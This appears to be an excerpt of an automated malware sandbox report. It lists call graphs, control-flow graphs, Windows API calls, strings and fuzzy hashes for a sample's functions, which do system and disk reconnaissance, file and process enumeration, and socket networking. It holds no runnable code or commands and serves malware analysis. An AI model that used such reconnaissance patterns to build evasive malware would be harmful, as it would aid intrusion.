82429->82431 82445 566f10 socket ioctlsocket connect getsockname closesocket 82429->82445 82431->82429 82435 57a944 82434->82435 82436 57a977 send 82435->82436 82437 57a94b 82435->82437 82436->82426 82437->82426 82442 5670ae 82438->82442 82440 5671a7 82440->82417 82441 56717f 82441->82440 82455 579320 socket ioctlsocket connect getsockname closesocket 82441->82455 82442->82440 82442->82441 82450 57a8c0 82442->82450 82454 5671c0 socket ioctlsocket connect getsockname 82442->82454 82445->82429 82446->82417 82447->82426 82448->82419 82449->82425 82451 57a8e6 82450->82451 82452 57a903 recvfrom 82450->82452 82451->82452 82453 57a8ed 82451->82453 82452->82453 82453->82442 82454->82442 82455->82440

                                                              Executed Functions

                                                              Function 004EF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: 2c03bb6476cd43d93105d0a6ee9fb4c17a1c91cf76cdb82034a41fd637768c47
                                                              • Instruction ID: db0be4b5bb2735adc8cc1beb34bbbb8ed666770858c07b934a18b62f4849f4a6
                                                              • Opcode Fuzzy Hash: 2c03bb6476cd43d93105d0a6ee9fb4c17a1c91cf76cdb82034a41fd637768c47
                                                              • Instruction Fuzzy Hash: 2DC2AF31A043849FD714CF2AC480B6BB7E1BF84318F05866EED989B352D775E989CB85
                                                              Function 004B255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 857 4b255d-4b2614 call 839f70 GetSystemInfo call 8ef770 call 8ef960 GlobalMemoryStatusEx call 8ef770 call 8ef960 939 4b2619 call 7140296 857->939 940 4b2619 call 71401d6 857->940 941 4b2619 call 7140257 857->941 942 4b2619 call 71402d7 857->942 943 4b2619 call 7140350 857->943 944 4b2619 call 7140152 857->944 945 4b2619 call 7140058 857->945 946 4b2619 call 7140219 857->946 947 4b2619 call 714001a 857->947 948 4b2619 call 714019b 857->948 949 4b2619 call 7140304 857->949 950 4b2619 call 7140284 857->950 951 4b2619 call 7140385 857->951 952 4b2619 call 71401c5 857->952 953 4b2619 call 7140146 857->953 954 4b2619 call 7140186 857->954 955 4b2619 call 7140207 857->955 956 4b2619 call 7140240 857->956 957 4b2619 call 7140000 857->957 958 4b2619 call 7140042 857->958 959 4b2619 call 7140008 857->959 960 4b2619 call 7140109 857->960 961 4b2619 call 7140335 857->961 962 4b2619 call 71400f5 857->962 963 4b2619 call 71402f6 857->963 964 4b2619 call 714007c 857->964 965 4b2619 call 7140266 857->965 966 4b2619 call 7140321 857->966 967 4b2619 call 71400a3 857->967 968 4b2619 call 71400ac 857->968 969 4b2619 call 71401a8 857->969 970 4b2619 call 71402a9 857->970 868 4b261b-4b2620 869 4b277c-4b2904 call 8ef770 call 8ef960 KiUserCallbackDispatcher call 8ef770 call 8ef960 call 8ef770 call 8ef960 call 838e38 call 838be0 call 838bd0 FindFirstFileW 868->869 870 4b2626-4b2637 call 8ef570 868->870 917 4b2928-4b292c 869->917 918 4b2906-4b2926 FindNextFileW 869->918 875 4b2754-4b275c 870->875 876 4b263c-4b264f GetDriveTypeA 875->876 877 4b2762-4b2777 call 8ef960 875->877 881 4b2743-4b2751 call 838b98 876->881 882 4b2655-4b2685 GetDiskFreeSpaceExA 876->882 877->869 881->875 882->881 884 4b268b-4b273e call 8ef840 call 8ef8d0 call 8ef960 call 8ef660 call 8ef960 call 8ef660 call 8ef960 call 8edce0 882->884 884->881 919 4b292e 917->919 920 4b2932-4b296f call 8ef770 call 8ef960 call 838e78 917->920 918->917 918->918 919->920 926 4b2974-4b2979 920->926 927 4b297b-4b29a4 call 8ef770 call 8ef960 926->927 928 4b29a9-4b29fe call 83a290 call 8ef770 call 8ef960 926->928 927->928 939->868 940->868 941->868 942->868 943->868 944->868 945->868 946->868 947->868 948->868 949->868 950->868 951->868 952->868 953->868 954->868 955->868 956->868 957->868 958->868 959->868 960->868 961->868 962->868 963->868 964->868 965->868 966->868 967->868 968->868 969->868 970->868
                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 004B2579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 004B25CC
                                                              • GetDriveTypeA.KERNELBASE ref: 004B2647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 004B267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 004B27E2
                                                              • FindFirstFileW.KERNELBASE ref: 004B28F8
                                                              • FindNextFileW.KERNELBASE ref: 004B291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: ;%K$@$`
                                                              • API String ID: 3271271169-2163641105
                                                              • Opcode ID: 4b22af700c29e6b846c0a849bf79b1dbba82dfaa869cc9d95d93d2f329553a38
                                                              • Instruction ID: 953aad7846717878507280756f68b69350ea4d2e7aa3d823c98ee1f4607371c6
                                                              • Opcode Fuzzy Hash: 4b22af700c29e6b846c0a849bf79b1dbba82dfaa869cc9d95d93d2f329553a38
                                                              • Instruction Fuzzy Hash: 74D1B1B49053099FCB10EF69C98569EBBF0FF88344F018969E898D7351E7749A84CF92
                                                              Function 004B29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1392 4b29ff-4b2a2f FindFirstFileA 1393 4b2a38 1392->1393 1394 4b2a31-4b2a36 1392->1394 1395 4b2a3d-4b2a91 call 8ef8d0 call 8ef960 RegOpenKeyExA 1393->1395 1394->1395 1400 4b2a9a 1395->1400 1401 4b2a93-4b2a98 1395->1401 1402 4b2a9f-4b2b0c call 8ef8d0 call 8ef960 CharUpperA call 838da0 1400->1402 1401->1402 1410 4b2b0e-4b2b13 1402->1410 1411 4b2b15 1402->1411 1412 4b2b1a-4b2b92 call 8ef8d0 call 8ef960 call 838e80 call 838e70 1410->1412 1411->1412 1421 4b2bcc-4b2c66 QueryFullProcessImageNameA CloseHandle call 838da0 1412->1421 1422 4b2b94-4b2ba3 1412->1422 1432 4b2c68-4b2c6d 1421->1432 1433 4b2c6f 1421->1433 1425 4b2bb0-4b2bc0 call 838e68 1422->1425 1426 4b2ba5-4b2bae 1422->1426 1429 4b2bc5-4b2bca 1425->1429 1426->1421 1429->1421 1429->1422 1434 4b2c74-4b2ce9 call 8ef8d0 call 8ef960 call 838e80 call 838e70 1432->1434 1433->1434 1443 4b2dcf-4b2e1c call 8ef8d0 call 8ef960 CloseHandle 1434->1443 1444 4b2cef-4b2d49 call 838bb0 call 838da0 1434->1444 1454 4b2e23-4b2e2e 1443->1454 1455 4b2d4b-4b2d63 call 838da0 1444->1455 1456 4b2d99-4b2dad 1444->1456 1457 4b2e30-4b2e35 1454->1457 1458 4b2e37 1454->1458 1455->1456 1464 4b2d65-4b2d7d call 838da0 1455->1464 1456->1443 1460 4b2e3c-4b2ed6 call 8ef8d0 call 8ef960 1457->1460 1458->1460 1473 4b2eea 1460->1473 1474 4b2ed8-4b2ee1 1460->1474 1464->1456 1470 4b2d7f-4b2d97 call 838da0 1464->1470 1470->1456 1478 4b2daf-4b2dc9 call 838e68 1470->1478 1477 4b2eef-4b2f16 call 8ef8d0 call 8ef960 1473->1477 1474->1473 1476 4b2ee3-4b2ee8 1474->1476 1476->1477 1478->1443 1478->1444
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 304e4cfd02be2b60d738bd604341c54ac581bbc5b7cc9e7eece425694f2ba1b1
                                                              • Instruction ID: 49520ab99ea655626f927bc2adebe6e2289c1411e6951742363656b294f20ff6
                                                              • Opcode Fuzzy Hash: 304e4cfd02be2b60d738bd604341c54ac581bbc5b7cc9e7eece425694f2ba1b1
                                                              • Instruction Fuzzy Hash: 80E1E6B0904309DFCB50EF68D98469EBBF4EF84300F01886AE488D7351E778DA858F52
                                                              Function 004C05B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1538 4c05b0-4c05b7 1539 4c05bd-4c05d4 1538->1539 1540 4c07ee 1538->1540 1541 4c05da-4c05e6 1539->1541 1542 4c07e7-4c07ed 1539->1542 1541->1542 1543 4c05ec-4c05f0 1541->1543 1542->1540 1544 4c05f6-4c0620 call 4c7350 call 4b70b0 1543->1544 1545 4c07c7-4c07cc 1543->1545 1550 4c066a-4c068c call 4edec0 1544->1550 1551 4c0622-4c0624 1544->1551 1545->1542 1557 4c07d6-4c07e3 call 4c7380 1550->1557 1558 4c0692-4c06a0 1550->1558 1552 4c0630-4c0655 call 4b70d0 call 4c03c0 call 4c7450 1551->1552 1578 4c07ce 1552->1578 1579 4c065b-4c0668 call 4b70e0 1552->1579 1557->1542 1561 4c06f4-4c06f6 1558->1561 1562 4c06a2-4c06a4 1558->1562 1564 4c06fc-4c06fe 1561->1564 1565 4c07ef-4c082b call 4c3000 1561->1565 1567 4c06b0-4c06e4 call 4c73b0 1562->1567 1570 4c072c-4c0754 1564->1570 1582 4c0a2f-4c0a35 1565->1582 1583 4c0831-4c0837 1565->1583 1567->1557 1577 4c06ea-4c06ee 1567->1577 1574 4c075f-4c078b 1570->1574 1575 4c0756-4c075b 1570->1575 1593 4c0700-4c0703 1574->1593 1594 4c0791-4c0796 1574->1594 1580 4c075d 1575->1580 1581 4c0707-4c0719 WSAEventSelect 1575->1581 1577->1567 1584 4c06f0 1577->1584 1578->1557 1579->1550 1579->1552 1589 4c0723-4c0726 1580->1589 1581->1557 1588 4c071f 1581->1588 1585 4c0a3c-4c0a52 1582->1585 1586 4c0a37-4c0a3a 1582->1586 1591 4c0839-4c084c call 4c6fa0 1583->1591 1592 4c0861-4c087e 1583->1592 1584->1561 1585->1557 1596 4c0a58-4c0a81 call 4c2f10 1585->1596 1586->1585 1588->1589 1589->1565 1589->1570 1603 4c0a9c-4c0aa4 1591->1603 1604 4c0852 1591->1604 1605 4c0882-4c088d 1592->1605 1593->1581 1594->1593 1598 4c079c-4c07c2 call 4b76a0 1594->1598 1596->1557 1611 4c0a87-4c0a97 call 4c6df0 1596->1611 1598->1593 1603->1557 1604->1592 1608 4c0854-4c085f 1604->1608 1609 4c0970-4c0975 1605->1609 1610 4c0893-4c08b1 1605->1610 1608->1605 1612 4c0a19-4c0a2c 1609->1612 1613 4c097b-4c0989 call 4b70b0 1609->1613 1614 4c08c8-4c08f7 1610->1614 1611->1557 1612->1582 1613->1612 1621 4c098f-4c099e 1613->1621 1622 4c08fd-4c0925 1614->1622 1623 4c08f9-4c08fb 1614->1623 1624 4c09b0-4c09c1 call 4b70d0 1621->1624 1625 4c0928-4c093f 1622->1625 1623->1625 1631 4c09a0-4c09ae call 4b70e0 1624->1631 1632 4c09c3-4c09c7 1624->1632 1629 4c0945-4c096b 1625->1629 1630 4c08b3-4c08c2 1625->1630 1629->1630 1630->1609 1630->1614 1631->1612 1631->1624 1634 4c09e8-4c0a03 WSAEnumNetworkEvents 1632->1634 1635 4c0a05-4c0a17 1634->1635 1636 4c09d0-4c09e6 WSAEventSelect 1634->1636 1635->1636 1636->1631 1636->1634
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 004C0712
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 004C09DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004C09FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N=K$multi.c
                                                              • API String ID: 2170980988-3269766730
                                                              • Opcode ID: 4903e1aa09b530ed71226e4385cb7fd0e6d797fe8bd4cf70491bae0bbd00cd0b
                                                              • Instruction ID: 13434b525637176ad07e67d1b31c5b0cf150199fe0ad3e3d592b9bba70663a16
                                                              • Opcode Fuzzy Hash: 4903e1aa09b530ed71226e4385cb7fd0e6d797fe8bd4cf70491bae0bbd00cd0b
                                                              • Instruction Fuzzy Hash: 3AD1E179609301DFE750DF25C881BABB7E9FF94308F04882EF88582251E778E945CB5A
                                                              Function 004C6FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1709 4c6fa0-4c6fd2 1710 4c6feb-4c6ff1 1709->1710 1711 4c6fd4-4c6fd6 1709->1711 1713 4c7324-4c7330 1710->1713 1714 4c6ff7-4c6ff9 1710->1714 1712 4c6fe0-4c6fe4 1711->1712 1715 4c701b-4c7041 1712->1715 1716 4c6fe6-4c6fe9 1712->1716 1717 4c6fff-4c7016 1714->1717 1718 4c7186-4c7196 1714->1718 1719 4c7060-4c7074 1715->1719 1716->1710 1716->1712 1717->1713 1718->1713 1722 4c7076-4c7081 1719->1722 1723 4c7057-4c705a 1719->1723 1722->1723 1725 4c7083-4c7089 1722->1725 1723->1719 1724 4c7172-4c7174 1723->1724 1728 4c719b-4c71a8 1724->1728 1729 4c7176-4c7184 1724->1729 1726 4c70dc-4c70df 1725->1726 1727 4c708b-4c708f 1725->1727 1732 4c712c-4c7132 1726->1732 1733 4c70e1-4c70e5 1726->1733 1730 4c70b0-4c70bd 1727->1730 1731 4c7091 1727->1731 1734 4c71f1-4c722d call 4cd7f0 select 1728->1734 1735 4c71aa-4c71be 1728->1735 1729->1734 1740 4c70bf-4c70ce 1730->1740 1741 4c70d5 1730->1741 1738 4c70a0-4c70a7 1731->1738 1732->1723 1739 4c7138-4c713c 1732->1739 1743 4c70e7 1733->1743 1744 4c7100-4c710d 1733->1744 1759 4c730b 1734->1759 1760 4c7233-4c723e 1734->1760 1736 4c730d-4c7310 1735->1736 1737 4c71c4-4c71c6 1735->1737 1736->1713 1751 4c7312-4c7322 1736->1751 1745 4c71cc-4c71e6 1737->1745 1746 4c7331-4c7344 1737->1746 1738->1730 1747 4c70a9-4c70ac 1738->1747 1748 4c714d-4c715a 1739->1748 1749 4c713e 1739->1749 1740->1741 1741->1726 1752 4c70f0-4c70f7 1743->1752 1753 4c710f-4c711e 1744->1753 1754 4c7125 1744->1754 1745->1713 1769 4c71ec 1745->1769 1746->1713 1768 4c7346 1746->1768 1747->1738 1755 4c70ae 1747->1755 1757 4c7050 1748->1757 1758 4c7160-4c716d 1748->1758 1756 4c7140-4c7144 1749->1756 1751->1713 1752->1744 1761 4c70f9-4c70fc 1752->1761 1753->1754 1754->1732 1755->1730 1756->1748 1764 4c7146-4c7149 1756->1764 1757->1723 1758->1757 1759->1736 1765 4c725c-4c7269 1760->1765 1761->1752 1767 4c70fe 1761->1767 1764->1756 1770 4c714b 1764->1770 1771 4c726b-4c727b __WSAFDIsSet 1765->1771 1772 4c7253-4c7256 1765->1772 1767->1744 1768->1751 1769->1751 1770->1748 1773 4c727d-4c7287 1771->1773 1774 4c729a-4c72ac __WSAFDIsSet 1771->1774 1772->1713 1772->1765 1777 4c728e-4c7293 1773->1777 1778 4c7289 1773->1778 1775 4c72ae-4c72b3 1774->1775 1776 4c72ba-4c72c9 __WSAFDIsSet 1774->1776 1775->1776 1780 4c72b5 1775->1780 1781 4c72cf-4c72f6 1776->1781 1782 4c7240 1776->1782 1777->1774 1779 4c7295 1777->1779 1778->1777 1779->1774 1780->1776 1783 4c72fc-4c7306 1781->1783 1784 4c7245-4c724c 1781->1784 1782->1784 1783->1784 1784->1772
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d12d577204c7d0f123ad0f143e8a658b26f0c34e053d3a8979e450b6cf480488
                                                              • Instruction ID: b92017dac8c059962176123465810c27540038b4227d266adb22740d268dc496
                                                              • Opcode Fuzzy Hash: d12d577204c7d0f123ad0f143e8a658b26f0c34e053d3a8979e450b6cf480488
                                                              • Instruction Fuzzy Hash: 5591173860D3454BD7758A29C880BBB72D5FFC4360F148B2EE899432D4EB799C41DA86
                                                              Function 0057B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1785 57b180-57b195 1786 57b3e0-57b3e7 1785->1786 1787 57b19b-57b1a2 1785->1787 1788 57b1b0-57b1b9 1787->1788 1788->1788 1789 57b1bb-57b1bd 1788->1789 1789->1786 1790 57b1c3-57b1d0 1789->1790 1792 57b1d6-57b1f2 1790->1792 1793 57b3db 1790->1793 1794 57b229-57b22d 1792->1794 1793->1786 1795 57b233-57b246 1794->1795 1796 57b3e8-57b417 1794->1796 1797 57b260-57b264 1795->1797 1798 57b248-57b24b 1795->1798 1803 57b582-57b589 1796->1803 1804 57b41d-57b429 1796->1804 1799 57b269-57b286 call 57af30 1797->1799 1800 57b215-57b223 1798->1800 1801 57b24d-57b256 1798->1801 1813 57b2f0-57b301 1799->1813 1814 57b288-57b2a3 call 57b060 1799->1814 1800->1794 1806 57b315-57b33c call 838b00 1800->1806 1801->1799 1807 57b435-57b44c call 57b590 1804->1807 1808 57b42b-57b433 call 57b590 1804->1808 1816 57b342-57b347 1806->1816 1817 57b3bf-57b3ca 1806->1817 1824 57b44e-57b456 call 57b590 1807->1824 1825 57b458-57b471 call 57b590 1807->1825 1808->1807 1813->1800 1834 57b307-57b310 1813->1834 1830 57b200-57b213 call 57b020 1814->1830 1831 57b2a9-57b2c7 getsockname call 57b020 1814->1831 1821 57b384-57b38f 1816->1821 1822 57b349-57b358 1816->1822 1826 57b3cc-57b3d9 1817->1826 1821->1817 1829 57b391-57b3a5 1821->1829 1828 57b360-57b382 1822->1828 1824->1825 1843 57b473-57b487 1825->1843 1844 57b48c-57b4a7 1825->1844 1826->1786 1828->1821 1828->1828 1835 57b3b0-57b3bd 1829->1835 1830->1800 1841 57b2cc-57b2dd 1831->1841 1834->1826 1835->1817 1835->1835 1841->1800 1845 57b2e3 1841->1845 1843->1803 1846 57b4b3-57b4cb call 57b660 1844->1846 1847 57b4a9-57b4b1 call 57b660 1844->1847 1845->1834 1852 57b4cd-57b4d5 call 57b660 1846->1852 1853 57b4d9-57b4f5 call 57b660 1846->1853 1847->1846 1852->1853 1858 57b4f7-57b50b 1853->1858 1859 57b50d-57b52b call 57b770 * 2 1853->1859 1858->1803 1859->1803 1864 57b52d-57b531 1859->1864 1865 57b533-57b53b 1864->1865 1866 57b580 1864->1866 1867 57b53d-57b547 1865->1867 1868 57b578-57b57e 1865->1868 1866->1803 1867->1868 1869 57b549-57b54d 1867->1869 1868->1803 1869->1868 1870 57b54f-57b558 1869->1870 1870->1868 1871 57b55a-57b576 call 57b870 * 2 1870->1871 1871->1803 1871->1868
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 0057B2B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
